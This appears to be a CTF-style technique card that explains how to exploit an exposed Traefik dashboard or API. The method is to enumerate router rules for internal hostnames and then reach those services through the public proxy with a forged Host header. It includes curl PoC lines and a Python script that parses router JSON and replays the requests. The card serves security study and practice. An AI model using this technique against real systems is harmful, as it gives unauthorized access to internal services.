web proxy traefik host-header routing information-disclosure

Read Traefik router rules to learn internal vhost names, then route your request by sending the expected Host header.

Traefik Dashboard / API Exposure → Routing via the Host Header

The dashboard or router API reveals how virtual hosts map to internal services. Once you know the expected Host, the edge proxy routes your request for you.

Why It Works

  • Traefik HTTP routers match on rules such as Host(`...`) and PathPrefix(`...`), evaluated against the request's Host header (or TLS SNI), not against DNS. Any request reaching the public entrypoint with a matching Host is forwarded to that router's service, so learning an internal hostname is enough to reach the internal service through the public edge.

Vulnerable Pattern

  • Traefik's API (/api/...), dashboard (/dashboard/), or debug endpoints reachable on the same public entrypoint as the challenge, e.g. via an api@internal router or --api.insecure=true forwarded through the edge.

Exploit Flow

  1. Enumerate router rules, hostnames, middlewares, and service names from the dashboard/API.
  2. Replay public requests with the recovered Host header and test alternate paths.

Variations

  • Host-based routing, path prefixes, or middleware behaviors like auth bypass on internal-only hosts.

Common Blockers

  • The API/dashboard is read-only, so it only pays off when the router rules reveal a Host you could not have guessed; the upstream may also enforce its own auth layer (a Traefik middleware such as basic auth, or an application login) after routing.

PoC Sketch

curl http://target/api/http/routers
curl -H 'Host: internal.service.local' http://target/
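A worked version of the two steps above (enumerate router rules, then replay with the recovered Host), as an added example that is not part of the original card or of Traefik itself. It parses the JSON that Traefik's `/api/http/routers` returns, pulls every hostname and path out of the `rule` strings, and builds the list of Host/path pairs to replay against the public edge. The router list is a constructed sample with made-up hostnames and service names; only the field names (`name`, `rule`, `service`, `middlewares`, `entryPoints`) follow the real API. `replay()` is the network step and is optional to run.

```python
import json
import re
import urllib.error
import urllib.request

# Constructed sample of a GET /api/http/routers response. Hostnames and
# service names are invented for the example; field names match Traefik v2.
SAMPLE_ROUTERS = json.dumps([
    {"entryPoints": ["web"], "service": "challenge@docker",
     "rule": "Host(`challenge.example`)", "name": "challenge@docker", "status": "enabled"},
    {"entryPoints": ["web"], "service": "admin@docker",
     "rule": "Host(`admin.internal.local`) && PathPrefix(`/admin`)",
     "middlewares": ["basic-auth@docker"], "name": "admin@docker", "status": "enabled"},
    {"entryPoints": ["web"], "service": "api@internal",
     "rule": "PathPrefix(`/api`) || PathPrefix(`/dashboard`)", "name": "api@docker", "status": "enabled"},
    {"entryPoints": ["web"], "service": "flag@docker",
     "rule": "Host(`flag.internal.local`)", "name": "flag@docker", "status": "enabled"},
])


def parse_rule(rule):
    """Extract Host(...) and Path/PathPrefix(...) values from a Traefik rule string.

    Traefik allows several comma-separated backticked values inside one matcher,
    e.g. Host(`a.local`, `b.local`), so each matcher group is scanned for all of them.
    HostRegexp(...) rules are not expanded here; they would need manual handling.
    """
    hosts = []
    for group in re.findall(r"Host\(([^)]*)\)", rule):
        hosts.extend(re.findall(r"`([^`]+)`", group))
    paths = []
    for group in re.findall(r"Path(?:Prefix)?\(([^)]*)\)", rule):
        paths.extend(re.findall(r"`([^`]+)`", group))
    return hosts, paths


def candidates(routers_json, public_host=None):
    """Turn the router list into Host/path pairs worth replaying through the edge.

    Routers without a Host matcher are skipped (nothing new to learn), as is the
    hostname the challenge is already served on. Attached middlewares are kept so
    the reader can see up front which routes still have an auth layer in front.
    """
    out = []
    for router in json.loads(routers_json):
        hosts, paths = parse_rule(router.get("rule", ""))
        for host in hosts:
            if host == public_host:
                continue
            for path in (paths or ["/"]):
                out.append({
                    "router": router.get("name"),
                    "host": host,
                    "path": path,
                    "service": router.get("service"),
                    "middlewares": router.get("middlewares", []),
                })
    return out


def replay(base_url, host, path, timeout=5):
    """Send a request to the public edge with the recovered Host header.

    urllib honours an explicit Host header instead of deriving one from the URL,
    which is exactly what the technique needs. Returns (status, first 200 bytes).
    """
    req = urllib.request.Request(base_url.rstrip("/") + path,
                                 headers={"Host": host, "User-Agent": "curl/8"})
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            return resp.status, resp.read(200)
    except urllib.error.HTTPError as e:
        return e.code, e.read(200)


if __name__ == "__main__":
    # Offline demonstration on the constructed sample; swap SAMPLE_ROUTERS for
    # the body of `curl http://target/api/http/routers` against a real target.
    for c in candidates(SAMPLE_ROUTERS, public_host="challenge.example"):
        guard = f"  (middlewares: {', '.join(c['middlewares'])})" if c["middlewares"] else ""
        print(f"curl -H 'Host: {c['host']}' http://target{c['path']}  -> {c['service']}{guard}")
```

On the sample this yields two replays: `admin.internal.local` with `/admin` (flagged with its basic-auth middleware, the blocker noted above) and `flag.internal.local` with `/`. Against a live target, pipe the real `/api/http/routers` body in and call `replay("http://target", host, path)` for each candidate.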

Good Situations To Use It

  • A Traefik API/dashboard is exposed.
  • Internal vhosts map to interesting services.
  • Routing is host-header driven.

Sources

  • marshack2026/web/sur_ma_route